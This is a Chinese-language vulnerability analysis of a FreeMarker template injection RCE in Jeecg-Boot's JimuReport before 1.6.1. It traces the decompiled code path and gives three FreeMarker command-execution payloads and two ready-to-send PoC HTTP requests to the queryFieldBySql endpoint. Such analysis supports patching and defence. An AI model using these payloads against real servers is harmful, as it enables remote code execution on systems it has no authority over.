Jeecg-Boot framework模板注入

Jeecg-Boot积木报表JimuReport < 1.6.1存在Freemarker模板注入，攻击者可构造恶意请求触发模板注入，造成远程代码执行。

分析

用idea打开或者用jadx反编译jimureport-spring-boot-starter-1.5.8.jar

jimureport-spring-boot-starter-1.5.8.jar!\org\jeecg\modules\jmreport\desreport\a\a.class

可以看到获取json里面参数sql的值给var2

i.a(var2)是进行sql注入黑名单检查的这里贴个图

然后将var2带过去执行parseReportSql函数

jimureport-spring-boot-starter-1.5.8.jar!\org\jeecg\modules\jmreport\desreport\service\a\i.class

执行e.a(sql, var8, (JSONArray)null)

jimureport-spring-boot-starter-1.5.8.jar!\org\jeecg\modules\jmreport\desreport\util\e.class

jimureport-spring-boot-starter-1.5.8.jar!\org\jeecg\modules\jmreport\desreport\render\utils\FreeMarkerUtils.class

这里的var0是一开始的var2，freemarker模板注入的地方就不继续往下跟了

看着有点乱举个小栗子理解一下

FreeMarker的new内置函数

new 函数可以创建一个继承自 freemarker.template.TemplateModel 类的变量

FreeMarker模板注入的payload

<#assign value="freemarker.template.utility.ObjectConstructor"?new()>${value("java.lang.ProcessBuilder","calc").start()}

<#assign value="freemarker.template.utility.JythonRuntime"?new()><@value>import os;os.system("calc")

<#assign value="freemarker.template.utility.Execute"?new()>${value("calc")}

POC

无回显

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: localhost:8080
Content-Type: application/json
Content-Length: 89

{"sql":"<#assign value=\"freemarker.template.utility.Execute\"?new()>${value(\"calc\")}"}

有回显

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: localhost:8080
Content-Type: application/json
Content-Length: 100

{"sql":"select '<#assign value=\"freemarker.template.utility.Execute\"?new()>${value(\"whoami\")}'"}